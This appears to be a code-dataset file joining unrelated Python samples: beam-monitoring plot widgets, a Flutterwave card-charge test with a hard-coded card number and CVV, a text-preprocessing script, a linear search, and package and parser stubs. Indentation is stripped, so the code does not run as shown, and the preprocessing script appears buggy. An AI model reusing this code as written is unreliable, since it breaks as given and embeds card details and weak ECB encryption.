Data is displayed in rolling manner over period seconds. The plot unit can be switched between Volt and Ampere"""
unitChanged = QtCore.pyqtSignal(str)
def __init__(self, daq_setup, daq_device=None, parent=None):
# Init class attributes
self.daq_setup = daq_setup
self.use_unit = 'V'
# Call __init__ of ScrollingIrradDataPlot
super(RawDataPlot, self).__init__(channels=daq_setup['devices']['adc']['channels'], units={'left': self.use_unit},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
# Make in-plot button to switch between units
unit_btn = PlotPushButton(plotitem=self.plt, text='Switch unit ({})'.format('A'))
unit_btn.clicked.connect(self.change_unit)
# Connect to signal
for con in [lambda u: self.plt.getAxis('left').setLabel(text='Signal', units=u),
lambda u: unit_btn.setText('Switch unit ({})'.format('A' if u == 'V' else 'V')),
lambda u: setattr(self, '_data', self.convert_to_unit(self._data, u))]: # convert between units
self.unitChanged.connect(con)
# Add
self.add_plot_button(unit_btn)
def change_unit(self):
self.use_unit = 'V' if self.use_unit == 'A' else 'A'
self.unitChanged.emit(self.use_unit)
def convert_to_unit(self, data, unit):
"""Method to convert raw data between Volt and Ampere"""
# Check whether data is not None
if not data:
logging.info('No data to convert')
return
res = OrderedDict()
# Loop over data and overwrite
for ch in data:
_idx = self.channels.index(ch)
# Get data, scale and type of channel
val, scale, _type = data[ch], self.daq_setup['devices']['adc']['ro_scales'][_idx], self.daq_setup['devices']['adc']['types'][_idx]
# Adjust scale in case we're looking at SEM's sum signal; in this case current is multiplied by factor of 4
scale *= 1 if _type != 'sem_sum' else 4
res[ch] = val / 5.0 * scale * 1e-9 if unit == 'A' else val * 5.0 / 1e-9 / scale
return res
def set_data(self, data):
"""Overwrite set_data method in order to show raw data in Ampere and Volt"""
# Convert voltages to currents and overwrite
if self.use_unit == 'A':
data['data'] = self.convert_to_unit(data['data'], self.use_unit)
super(RawDataPlot, self).set_data(data)
class PlotPushButton(pg.TextItem):
"""Implements a in-plot push button for a PlotItem"""
clicked = QtCore.pyqtSignal()
def __init__(self, plotitem, **kwargs):
if 'border' not in kwargs:
kwargs['border'] = pg.mkPen(color='w', style=pg.QtCore.Qt.SolidLine)
super(PlotPushButton, self).__init__(**kwargs)
self.setParentItem(plotitem)
self.setOpacity(0.7)
self.btn_area = QtCore.QRectF(self.mapToParent(self.boundingRect().topLeft()), self.mapToParent(self.boundingRect().bottomRight()))
# Connect to relevant signals
plotitem.scene().sigMouseMoved.connect(self._check_hover)
plotitem.scene().sigMouseClicked.connect(self._check_click)
def setPos(self, *args, **kwargs):
super(PlotPushButton, self).setPos(*args, **kwargs)
self.btn_area = QtCore.QRectF(self.mapToParent(self.boundingRect().topLeft()), self.mapToParent(self.boundingRect().bottomRight()))
def setFill(self, *args, **kwargs):
self.fill = pg.mkBrush(*args, **kwargs)
def _check_hover(self, evt):
if self.btn_area.contains(evt):
self.setOpacity(1.0)
else:
self.setOpacity(0.7)
def _check_click(self, b):
if self.btn_area.contains(b.scenePos()):
self.clicked.emit()
class BeamCurrentPlot(ScrollingIrradDataPlot):
"""Plot for displaying the proton beam current over time. Data is displayed in rolling manner over period seconds"""
def __init__(self, beam_current_setup=None, daq_device=None, parent=None):
# Init class attributes
self.beam_current_setup = beam_current_setup
# Call __init__ of ScrollingIrradDataPlot
super(BeamCurrentPlot, self).__init__(channels=['analog', 'digital'], units={'left': 'A', 'right': 'A'},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
self.plt.setLabel('left', text='Beam current', units='A')
self.plt.hideAxis('left')
self.plt.showAxis('right')
self.plt.setLabel('right', text='Beam current', units='A')
class TemperatureDataPlot(ScrollingIrradDataPlot):
def __init__(self, temp_setup, daq_device=None, parent=None):
self.temp_setup = temp_setup
super(TemperatureDataPlot, self).__init__(channels=temp_setup['devices']['temp'].values(), units={'right': 'C', 'left': 'C'},
name=type(self).__name__ + ('' if daq_device is None else ' ' + daq_device),
parent=parent)
self.plt.setLabel('left', text='Temperature', units='C')
self.plt.hideAxis('left')
self.plt.showAxis('right')
self.plt.setLabel('right', text='Temperature', units='C')
class CrosshairItem:
"""This class implements three pyqtgraph items in order to display a reticle with a circle in its intersection."""
def __init__(self, color, name, intersect_symbol=None, horizontal=True, vertical=True):
if not horizontal and not vertical:
raise ValueError('At least one of horizontal or vertical beam position must be true!')
# Whether to show horizontal and vertical lines
self.horizontal = horizontal
self.vertical = vertical
# Init items needed
self.h_shift_line = pg.InfiniteLine(angle=90)
self.v_shift_line = pg.InfiniteLine(angle=0)
self.intersect = pg.ScatterPlotItem()
# Drawing style
self.h_shift_line.setPen(color=color, style=pg.QtCore.Qt.SolidLine, width=2)
self.v_shift_line.setPen(color=color, style=pg.QtCore.Qt.SolidLine, width=2)
self.intersect.setPen(color=color, style=pg.QtCore.Qt.SolidLine)
self.intersect.setBrush(color=color)
self.intersect.setSymbol('o' if intersect_symbol is None else intersect_symbol)
self.intersect.setSize(10)
# Items
self.items = []
# Add the respective lines
if self.horizontal and self.vertical:
self.items = [self.intersect, self.h_shift_line, self.v_shift_line]
elif self.horizontal:
self.items.append(self.h_shift_line)
else:
self.items.append(self.v_shift_line)
self.legend = None
self.plotitem = None
self.name = name
def set_position(self, x=None, y=None):
if x is None and y is None:
raise ValueError('Either x or y position have to be given!')
if self.horizontal:
_x = x if x is not None else self.h_shift_line.value()
if self.vertical:
_y = y if y is not None else self.v_shift_line.value()
if self.horizontal and self.vertical:
self.h_shift_line.setValue(_x)
self.v_shift_line.setValue(_y)
self.intersect.setData([_x], [_y])
elif self.horizontal:
self.h_shift_line.setValue(_x)
else:
self.v_shift_line.setValue(_y)
def set_plotitem(self, plotitem):
self.plotitem = plotitem
def set_legend(self, legend):
self.legend = legend
def add_to_plot(self, plotitem=None):
if plotitem is None and self.plotitem is None:
raise ValueError('PlotItem item needed!')
for item in self.items:
if plotitem is None:
self.plotitem.addItem(item)
else:
plotitem.addItem(item)
def add_to_legend(self, label=None, legend=None):
if legend is None and self.legend is None:
raise ValueError('LegendItem needed!')
_lbl = label if label is not None else self.name
if legend is None:
self.legend.addItem(self.intersect, _lbl)
else:
legend.addItem(self.intersect, _lbl)
def remove_from_plot(self, plotitem=None):
if plotitem is None and self.plotitem is None:
raise ValueError('PlotItem item needed!')
for item in self.items:
if plotitem is None:
self.plotitem.removeItem(item)
else:
plotitem.removeItem(item)
def remove_from_legend(self, label=None, legend=None):
if legend is None and self.legend is None:
raise ValueError('LegendItem needed!')
_lbl = label if label is not None else self.name
if legend is None:
self.legend.removeItem(_lbl)
else:
legend.removeItem(_lbl)
class BeamPositionPlot(IrradPlotWidget):
"""
Plot for displaying the beam position. The position is displayed from analog and digital data if available.
"""
def __init__(self, daq_setup, position_range=None, daq_device=None, name=None, add_hist=True, parent=None):
super(BeamPositionPlot, self).__init__(parent=parent)
# Init class attributes
self.daq_setup = daq_setup
self.ro_types = daq_setup['devices']['adc']['types']
self.daq_device = daq_device
self._plt_range = position_range if position_range else [-110, 110] * 2
self._add_hist = add_hist
self.name = name if name is not None else type(self).__name__ if self.daq_device is None else type(self).__name__ + ' ' + self.daq_device
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(self.name)
self.plt.setLabel('left', text='Vertical displacement', units='%')
self.plt.setLabel('bottom', text='Horizontal displacement', units='%')
self.plt.showGrid(x=True, y=True, alpha=0.99)
self.plt.setRange(xRange=self._plt_range[:2], yRange=self._plt_range[2:])
self.plt.setLimits(**dict([(k, self._plt_range[i]) for i, k in enumerate(('xMin', 'xMax', 'yMin', 'yMax'))]))
self.plt.hideButtons()
self.enable_stats()
v_line = self.plt.addLine(x=0, pen={'color': 'w', 'style': pg.QtCore.Qt.DashLine})
h_line = self.plt.addLine(y=0., pen={'color': 'w', 'style': pg.QtCore.Qt.DashLine})
_ = pg.InfLineLabel(line=h_line, text='Left', position=0.05, movable=False)
_ = pg.InfLineLabel(line=h_line, text='Right', position=0.95, movable=False)
_ = pg.InfLineLabel(line=v_line, text='Up', position=0.95, movable=False)
_ = pg.InfLineLabel(line=v_line, text='Down', position=0.05, movable=False)
self.legend = pg.LegendItem(offset=(80, -50))
self.legend.setParentItem(self.plt)
if any(x in self.ro_types for x in ('sem_h_shift', 'sem_v_shift')):
sig = 'analog'
self.curves[sig] = CrosshairItem(color=_MPL_COLORS[0], name=sig,
horizontal='sem_h_shift' in self.ro_types,
vertical='sem_v_shift' in self.ro_types)
# Add 2D histogram
if self._add_hist and self.curves[sig].horizontal and self.curves[sig].vertical:
self.add_2d_hist(curve=sig, autoDownsample=True, opacity=0.66, cmap='hot')
if any(all(x in self.ro_types for x in y) for y in [('sem_left', 'sem_right'), ('sem_up', 'sem_down')]):
sig = 'digital'
self.curves[sig] = CrosshairItem(color=_MPL_COLORS[1], name=sig,
horizontal='sem_left' in self.ro_types and 'sem_right' in self.ro_types,
vertical='sem_up' in self.ro_types and 'sem_down' in self.ro_types)
# Add 2D histogram
if self._add_hist and self.curves[sig].horizontal and self.curves[sig].vertical:
self.add_2d_hist(curve=sig, autoDownsample=True, opacity=0.66, cmap='hot')
# Show data and legend
if self.curves:
for curve in self.curves:
if isinstance(self.curves[curve], CrosshairItem):
self.curves[curve].set_legend(self.legend)
self.curves[curve].set_plotitem(self.plt)
self.show_data(curve)
def add_2d_hist(self, curve, cmap='hot', bins=(50, 50), **kwargs):
if curve not in self.curves:
logging.error("Can only add histogram to existing curve")
return
if len(bins) != 2:
raise ValueError("Bins must be iterable of integers of len 2")
hist_name = curve + '_hist'
if 'lut' not in kwargs:
# Create colormap and init
colormap = mcmaps.get_cmap(cmap)
colormap._init()
# Convert matplotlib colormap from 0-1 to 0 -255 for Qt
lut = (colormap._lut * 255).view(np.ndarray)
# Update kw
kwargs['lut'] = lut
get_scale = lambda plt_range, n_bins: float(abs(plt_range[0] - plt_range[1])) / n_bins
# Add and manage position
self.curves[hist_name] = pg.ImageItem(**kwargs)
self.curves[hist_name].translate(self._plt_range[0], self._plt_range[2])
self.curves[hist_name].scale(get_scale(self._plt_range[:2], bins[0]), get_scale(self._plt_range[2:], bins[1]))
self.curves[hist_name].setZValue(-10)
# Add hist data
self._data[hist_name] = {}
self._data[hist_name]['hist'] = np.zeros(shape=bins)
self._data[hist_name]['edges'] = (np.linspace(self._plt_range[0], self._plt_range[1], bins[0] + 1),
np.linspace(self._plt_range[2], self._plt_range[3], bins[1] + 1))
self._data[hist_name]['centers'] = (0.5 * (self._data[hist_name]['edges'][0][1:] + self._data[hist_name]['edges'][0][:-1]),
0.5 * (self._data[hist_name]['edges'][1][1:] + self._data[hist_name]['edges'][1][:-1]))
def set_data(self, data):
# Meta data and data
meta, pos_data = data['meta'], data['data']['position']
for sig in pos_data:
if sig not in self.curves:
continue
h_shift = None if 'h' not in pos_data[sig] else pos_data[sig]['h']
v_shift = None if 'v' not in pos_data[sig] else pos_data[sig]['v']
# Update data
self._data[sig] = (h_shift, v_shift)
if sig + '_hist' in self.curves and all(x is not None for x in self._data[sig]):
# Get histogram indices and increment
idx_x, idx_y = (np.searchsorted(self._data[sig + '_hist']['edges'][i], self._data[sig][i]) for i in range(len(self._data[sig])))
try:
self._data[sig + '_hist']['hist'][idx_x, idx_y] += 1
except IndexError:
logging.debug("Histogram indices ({},{}) out of bounds for shape ({},{})".format(idx_x, idx_y, *self._data[sig + '_hist']['hist'].shape))
self._data_is_set = True
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
current_stat_text += ' '
# Histogram stats
if 'hist' in curve:
v = np.sum(self._data[curve]['hist'], axis=0)
h = np.sum(self._data[curve]['hist'], axis=1)
try: # Weights are fine
mean_h = np.average(self._data[curve]['centers'][0], weights=h)
std_h = np.sqrt(np.average((self._data[curve]['centers'][0] - mean_h)**2, weights=h))
                    mean_v = np.average(self._data[curve]['centers'][1], weights=v)
std_v = np.sqrt(np.average((self._data[curve]['centers'][1] - mean_v) ** 2, weights=v))
except ZeroDivisionError: # Weights sum up to 0; no histogram entries
mean_h = std_h = mean_v = std_v = np.nan
current_stat_text += curve + ':\n '
current_stat_text += u'Horizontal: ({:.2f} \u00B1 {:.2f}) {}'.format(mean_h, std_h, self.plt.getAxis('bottom').labelUnits) + '\n '
current_stat_text += u'Vertical: ({:.2f} \u00B1 {:.2f}) {}'.format(mean_v, std_v, self.plt.getAxis('left').labelUnits)
else:
current_stat_text += curve + ':\n ' + u'Position: ({:.2f}, {:.2f}) {}'.format(self._data[curve][0],
self._data[curve][1],
self.plt.getAxis('bottom').labelUnits)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100)
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for sig in self.curves:
if sig not in self._data:
continue
if isinstance(self.curves[sig], CrosshairItem):
self.curves[sig].set_position(*self._data[sig])
else:
self.curves[sig].setImage(self._data[sig]['hist'])
if self._show_stats:
self._set_stats()
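# Hedged sketch (added, not part of the original module): the incremental 2-D
# histogramming in BeamPositionPlot.set_data amounts to locating the bin of each new
# (x, y) sample within fixed edges and incrementing that cell. A standalone version
# using numpy could look like this (np.searchsorted(..., side='right') - 1 yields the
# bin index for monotonically increasing edges); it is not called anywhere.
def _increment_2d_hist_sketch(hist, edges_x, edges_y, x, y):
    ix = np.searchsorted(edges_x, x, side='right') - 1
    iy = np.searchsorted(edges_y, y, side='right') - 1
    if 0 <= ix < hist.shape[0] and 0 <= iy < hist.shape[1]:
        hist[ix, iy] += 1
    return hist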
class FluenceHist(IrradPlotWidget):
"""
    Plot for displaying the proton fluence per scan row as a histogram, together with per-row uncertainties and the mean fluence over all rows.
"""
def __init__(self, irrad_setup, refresh_rate=5, daq_device=None, parent=None):
super(FluenceHist, self).__init__(refresh_rate=refresh_rate, parent=parent)
# Init class attributes
self.irrad_setup = irrad_setup
self.daq_device = daq_device
self._data['hist_rows'] = np.arange(self.irrad_setup['n_rows'] + 1)
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(type(self).__name__ if self.daq_device is None else type(self).__name__ + ' ' + self.daq_device)
self.plt.setLabel('left', text='Proton fluence', units='cm^-2')
self.plt.setLabel('right', text='Neutron fluence', units='cm^-2')
self.plt.setLabel('bottom', text='Scan row')
self.plt.getAxis('right').setScale(self.irrad_setup['kappa'])
self.plt.getAxis('left').enableAutoSIPrefix(False)
self.plt.getAxis('right').enableAutoSIPrefix(False)
self.plt.setLimits(xMin=0, xMax=self.irrad_setup['n_rows'], yMin=0)
self.legend = pg.LegendItem(offset=(80, 80))
self.legend.setParentItem(self.plt)
# Histogram of fluence per row
self.curves['hist'] = pg.PlotCurveItem()
self.curves['hist'].setFillLevel(0.33)
self.curves['hist'].setBrush(pg.mkBrush(color=_MPL_COLORS[0]))
# Points at respective row positions
self.curves['points'] = pg.ScatterPlotItem()
self.curves['points'].setPen(color=_MPL_COLORS[2], style=pg.QtCore.Qt.SolidLine)
self.curves['points'].setBrush(color=_MPL_COLORS[2])
self.curves['points'].setSymbol('o')
self.curves['points'].setSize(10)
        # Errorbars for points; needs to be initialized with x, y args, otherwise it cannot be added to the PlotItem
self.curves['errors'] = pg.ErrorBarItem(x=np.arange(1), y=np.arange(1), beam=0.25)
# Horizontal line indication the mean fluence over all rows
self.curves['mean'] = pg.InfiniteLine(angle=0)
self.curves['mean'].setPen(color=_MPL_COLORS[1], width=2)
self.p_label = pg.InfLineLabel(self.curves['mean'], position=0.2)
self.n_label = pg.InfLineLabel(self.curves['mean'], position=0.8)
# Show data and legend
for curve in self.curves:
self.show_data(curve)
def set_data(self, data):
# Meta data and data
_meta, _data = data['meta'], data['data']
# Set data
self._data['hist'] = data['data']['hist']
self._data['hist_err'] = data['data']['hist_err']
# Get stats
self._data['hist_mean'], self._data['hist_std'] = (f(self._data['hist']) for f in (np.mean, np.std))
self._data_is_set = True
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for curve in self.curves:
if curve == 'hist':
try:
self.curves[curve].setData(x=self._data['hist_rows'], y=self._data['hist'], stepMode=True)
self.curves['mean'].setValue(self._data['hist_mean'])
self.p_label.setFormat('Mean: ({:.2E} +- {:.2E}) protons / cm^2'.format(self._data['hist_mean'], self._data['hist_std']))
self.n_label.setFormat('Mean: ({:.2E} +- {:.2E}) neq / cm^2'.format(*[x * self.irrad_setup['kappa'] for x in (self._data['hist_mean'],
self._data['hist_std'])]))
except Exception as e:
                        logging.warning('Fluence histogram exception: {}'.format(e))
elif curve == 'points':
self.curves[curve].setData(x=self._data['hist_rows'][:-1] + 0.5, y=self._data['hist'])
elif curve == 'errors':
self.curves[curve].setData(x=self._data['hist_rows'][:-1] + 0.5, y=self._data['hist'], height=np.array(self._data['hist_err']), pen=_MPL_COLORS[2])
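# Hedged sketch (added, not part of the original module): the right-hand axis of
# FluenceHist is simply the proton fluence scaled by the hardness factor kappa from
# the irradiation setup, i.e. the 1 MeV neutron-equivalent fluence. As a plain
# function (illustrative only):
def _proton_to_neq_fluence_sketch(proton_fluence, kappa):
    return proton_fluence * kappa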
class FractionHist(IrradPlotWidget):
"""This implements a histogram of the fraction of one signal to another"""
def __init__(self, rel_sig, norm_sig, bins=100, colors=_MPL_COLORS, refresh_rate=10, parent=None):
super(FractionHist, self).__init__(refresh_rate=refresh_rate, parent=parent)
# Signal names; relative signal versus the signal it's normalized to
self.rel_sig = rel_sig
self.norm_sig = norm_sig
# Get colors
self.colors = colors
# Hold data
self._data['hist'], self._data['edges'] = np.zeros(shape=bins), np.linspace(0, 100, bins + 1)
self._data['centers'] = 0.5 * (self._data['edges'][1:] + self._data['edges'][:-1])
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(type(self).__name__ + ' ' + self.rel_sig)
self.plt.setLabel('left', text='#')
self.plt.setLabel('bottom', text='Fraction {} / {}'.format(self.rel_sig, self.norm_sig), units='%')
self.plt.getAxis('left').enableAutoSIPrefix(False)
self.plt.showGrid(x=True, y=True)
self.plt.setLimits(xMin=0, xMax=self._data['edges'].shape[0], yMin=0)
self.legend = pg.LegendItem(offset=(80, 80))
self.legend.setParentItem(self.plt)
self.enable_stats()
# Histogram of fraction
self.curves['hist'] = pg.PlotCurveItem(name='{} / {} histogram'.format(self.rel_sig, self.norm_sig))
self.curves['hist'].setFillLevel(0.33)
self.curves['hist'].setBrush(pg.mkBrush(color=self.colors[0]))
# Init items needed
self.curves['current_frac'] = CrosshairItem(color=self.colors[1], name='Current bin')
self.curves['current_frac'].v_shift_line.setValue(5) # Make crosshair point visible above 0
self.curves['current_frac'].v_shift_line.setVisible(False) # We need x and y for the dot in the middle but we don't want horizontal line to be visible
self.curves['current_frac'].set_legend(self.legend)
self.curves['current_frac'].set_plotitem(self.plt)
# Show data and legend
for curve in self.curves:
self.show_data(curve)
def set_data(self, data):
# Meta data and data
_meta, _data = data['meta'], data['data']
        # Store current fraction
self._data['fraction'] = _data
# Histogram fraction
hist_idx = np.searchsorted(self._data['edges'], _data)
try:
self._data['hist'][hist_idx] += 1
self._data['hist_idx'] = hist_idx
self._data_is_set = True
except IndexError:
logging.debug("Histogram index {} out of bounds for shape {}".format(hist_idx, *self._data['hist'].shape))
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
current_stat_text += ' '
# Histogram stats
if 'hist' in curve:
try:
mean = np.average(self._data['centers'], weights=self._data['hist'])
std = np.sqrt(np.average((self._data['centers'] - mean)**2, weights=self._data['hist']))
except ZeroDivisionError: # Weights sum up to 0; no histogram entries
mean = std = np.nan
current_stat_text += curve + u': ({:.2f} \u00B1 {:.2f}) {}'.format(mean, std, self.plt.getAxis('bottom').labelUnits)
else:
current_stat_text += curve + u': {:.2f} {}'.format(self._data['fraction'], self.plt.getAxis('bottom').labelUnits)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100)
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
# test if 'set_data' has been called
if self._data_is_set:
for curve in self.curves:
if curve == 'hist':
self.curves[curve].setData(x=self._data['edges'], y=self._data['hist'], stepMode=True)
if curve == 'current_frac':
self.curves[curve].set_position(x=self._data['hist_idx'] + 0.5, y=self._data['hist'][self._data['hist_idx']])
if self._show_stats:
self._set_stats()
|
StarcoderdataPython
|
8120549
|
import os, hashlib, warnings, requests, json
import base64
from Crypto.Cipher import DES3
class PayTest(object):
    def __init__(self):
        pass
    def getKey(self, secret_key):
        """This is the getKey function that generates an encryption key for you by passing your secret key as a parameter."""
hashedseckey = hashlib.md5(secret_key.encode("utf-8")).hexdigest()
hashedseckeylast12 = hashedseckey[-12:]
seckeyadjusted = secret_key.replace('FLWSECK-', '')
seckeyadjustedfirst12 = seckeyadjusted[:12]
return seckeyadjustedfirst12 + hashedseckeylast12
"""This is the encryption function that encrypts your payload by passing the text and your encryption Key."""
def encryptData(self, key, plainText):
blockSize = 8
padDiff = blockSize - (len(plainText) % blockSize)
cipher = DES3.new(key, DES3.MODE_ECB)
plainText = "{}{}".format(plainText, "".join(chr(padDiff) * padDiff))
# cipher.encrypt - the C function that powers this doesn't accept plain string, rather it accepts byte strings, hence the need for the conversion below
test = plainText.encode('utf-8')
encrypted = base64.b64encode(cipher.encrypt(test)).decode("utf-8")
return encrypted
def pay_via_card(self):
data = {
'PBFPubKey': '<KEY>',
"cardno": "4775750000424189",
"cvv": "953",
"expirymonth": "10",
"expiryyear": "20",
"currency": "NGN",
"country": "NG",
"amount": "12",
"email": "<EMAIL>",
"phonenumber": "256783474784",
"firstname": "Michael",
"lastname": "Katagaya",
"IP": "355426087298442",
"txRef": "test01",
"device_fingerprint": "<KEY>"
}
sec_key = '<KEY>'
# hash the secret key with the get hashed key function
hashed_sec_key = self.getKey(sec_key)
# encrypt the hashed secret key and payment parameters with the encrypt function
encrypt_3DES_key = self.encryptData(hashed_sec_key, json.dumps(data))
# payment payload
payload = {
"PBFPubKey": "<KEY>",
"client": encrypt_3DES_key,
"alg": "3DES-24"
}
# card charge endpoint
endpoint = "https://api.ravepay.co/flwv3-pug/getpaidx/api/charge"
# set the content type to application/json
headers = {
'content-type': 'application/json',
}
response = requests.post(endpoint, headers=headers, data=json.dumps(payload))
print(response.json())
rave = PayTest()
rave.pay_via_card()
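# Hedged sketch (added, not part of the original snippet): the inverse of
# encryptData() above, assuming the same 3DES/ECB cipher and the chr(padDiff)
# padding scheme. It is defined only for illustration and never called.
def decrypt_data_sketch(key, encrypted_b64):
    cipher = DES3.new(key, DES3.MODE_ECB)
    decrypted = cipher.decrypt(base64.b64decode(encrypted_b64))
    last = decrypted[-1]
    pad_len = last if isinstance(last, int) else ord(last)
    return decrypted[:-pad_len].decode("utf-8")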
|
StarcoderdataPython
|
3248535
|
import numpy as np
import pickle
lexicon = []
with open('ptb.txt','r') as f:
contents = f.readlines()
for l in contents[:len(contents)]:
all_words=l.split()
lexicon += list(all_words)
lexicon = list(set(lexicon));
print(lexicon)
vocb_size=len(lexicon)+1
print('vocb_size', vocb_size)
pad=vocb_size
voc = lexicon
vocab=dict([(x, y) for (y, x) in enumerate(voc)])
rev_vocab=dict([(x, y) for (x, y) in enumerate(voc)])
# Input data_file
with open('ptb.txt','r') as f:
contents = f.readlines()
x=[]
for sentence in contents:
a=sentence;
d=sorted(a);
token=[vocab.get(w) for w in d]
n_token=[]
for i in token:
if(i!= None):
n_token.append(i)
x.append(n_token)
max_len=0
ipf=[]
for i in x:
if max_len<=len(i):
max_len=len(i)
else: max_len=max_len
for i in x:
j=[]
j=np.lib.pad(i, (0,max_len-len(i)), 'constant', constant_values=(pad))
ipf.append(j)
data_x = np.array(ipf).T
# Train_X
testing_size=int(data_x.shape[1]-1)
train_x= data_x[:,:testing_size]
print('train_x.shape', train_x.shape)
#Getting Seq_len
seq_length=len(train_x)
print('seq_length', seq_length)
n_sents=train_x.shape[1]
print('n_sents', n_sents)
#Test_X
test_x=data_x[:,testing_size:]
print('test_x.shape', test_x.shape)
t=test_x.flatten()
tok=[rev_vocab.get(i) for i in t]
n_token=[]
for i in tok:
if(i!= None):
n_token.append(i)
c = ''.join(n_token);
print('Test_i/p',c)
# Output data_file
with open('ptb.txt','r') as f:
contents = f.readlines()
y=[]
for l in contents[:len(contents)]:
token=[vocab.get(w) for w in l]
n_token=[]
for i in token:
if(i!=None):
n_token.append(i)
y.append(n_token)
max_len=0
opf=[]
w=[]
for i in y:
if max_len<=len(i):
max_len=len(i)
else: max_len=max_len
for i in y:
j=[]
j=np.lib.pad(i, (0,max_len-len(i)), 'constant', constant_values=(pad))
p=np.ones_like(j,dtype=np.float32)
    for i in range(len(j)):
if j[i]==pad:
index_v=i
p[index_v]=0
w.append(p)
opf.append(j)
data_y = np.array(opf).T
#train_y
testing_size=int(data_y.shape[1]-1)
train_y=data_y[:,:testing_size]
print('train_y.shape', train_y.shape)
#test_y
test_y=data_y[:,testing_size:]
print('test_y.shape', test_y.shape)
t=test_y.flatten()
tok=[rev_vocab.get(i) for i in t]
n_token=[]
for i in tok:
if(i!= None):
n_token.append(i)
c = ''.join(n_token);
print('Test_o/p',c)
#data_weights
testing_size=int(data_y.shape[1]-1)
data_weight=np.array(w).T
weight=data_weight[:,:testing_size]
print('weight.shape', weight.shape)
with open('data_set.pickle','wb') as f:
pickle.dump([train_x,train_y,test_x,test_y,weight,seq_length,n_sents,vocb_size,rev_vocab],f)
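# Hedged usage sketch (added, not part of the original script): reload the pickle
# written above to check that the dump round-trips; the shapes should match the
# values printed earlier.
with open('data_set.pickle','rb') as f:
    train_x2, train_y2, test_x2, test_y2, weight2, seq_length2, n_sents2, vocb_size2, rev_vocab2 = pickle.load(f)
print('reloaded train_x.shape', train_x2.shape)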
|
StarcoderdataPython
|
12816082
|
<gh_stars>0
def linear_search(arr, n, x):
for i in range(n):
if arr[i] == x:
return True
return False
arr = [23,512,214,12,5,67,1,4,65]
result = linear_search(arr, len(arr), 214)
print('Search element found:', result)
|
StarcoderdataPython
|
5147365
|
# -*- coding: utf-8 -*-
""" systemcheck - A Python-based extensive configuration validation solution
systemcheck is a simple application that has two primary functions:
* Compare the configuration of a specific system parameters against a list of desired values
* Document the configuration of a specific system.
"""
# define authorship information
__authors__ = ['<NAME>']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2017'
__license__ = 'GNU AGPLv3'
# maintenance information
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
# define version information
__requires__ = ['PyQt5']
__version_info__ = (0, 1, 0)
__version__ = 'v{}.{}.{}'.format(*__version_info__)
__revision__ = __version__
#from systemcheck import plugins
#from systemcheck import config
#from systemcheck import models
#from systemcheck import session
#from systemcheck import systems
#from systemcheck import checks
#from systemcheck import gui
import systemcheck.checks
import systemcheck.plugins
import systemcheck.config
import systemcheck.models
import systemcheck.session
import systemcheck.systems
import systemcheck.gui
|
StarcoderdataPython
|
5002959
|
from monitor import *
runner = monitor()
print 'valid classifier', runner.valid_S2L()
print 'valid CLM:', runner.valid_L2S()
|
StarcoderdataPython
|
278867
|
# -*- coding: utf-8 -*-
"""Parser for Extensible Storage Engine (ESE) database files (EDB)."""
import pyesedb
from plaso.lib import specification
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import plugins
class ESEDatabase(object):
"""Extensible Storage Engine (ESE) database."""
def __init__(self):
"""Initializes a Extensible Storage Engine (ESE) database."""
super(ESEDatabase, self).__init__()
self._esedb_file = None
self._table_names = []
@property
def tables(self):
"""list[str]: names of all the tables."""
if not self._table_names:
for esedb_table in self._esedb_file.tables:
self._table_names.append(esedb_table.name)
return self._table_names
def Close(self):
"""Closes the database."""
self._esedb_file.close()
self._esedb_file = None
def GetTableByName(self, name):
"""Retrieves a table by its name.
Args:
name (str): name of the table.
Returns:
pyesedb.table: the table with the corresponding name or None if there is
no table with the name.
"""
return self._esedb_file.get_table_by_name(name)
def Open(self, file_object):
"""Opens an Extensible Storage Engine (ESE) database file.
Args:
file_object (dfvfs.FileIO): file-like object.
Raises:
IOError: if the file-like object cannot be read.
OSError: if the file-like object cannot be read.
ValueError: if the file-like object is missing.
"""
if not file_object:
raise ValueError('Missing file object.')
self._esedb_file = pyesedb.file()
self._esedb_file.open_file_object(file_object)
class ESEDBCache(plugins.BasePluginCache):
"""A cache storing query results for ESEDB plugins."""
def StoreDictInCache(self, attribute_name, dict_object):
"""Store a dict object in cache.
Args:
attribute_name (str): name of the attribute.
dict_object (dict): dictionary.
"""
setattr(self, attribute_name, dict_object)
class ESEDBParser(interface.FileObjectParser):
"""Parses Extensible Storage Engine (ESE) database files (EDB)."""
_INITIAL_FILE_OFFSET = None
NAME = 'esedb'
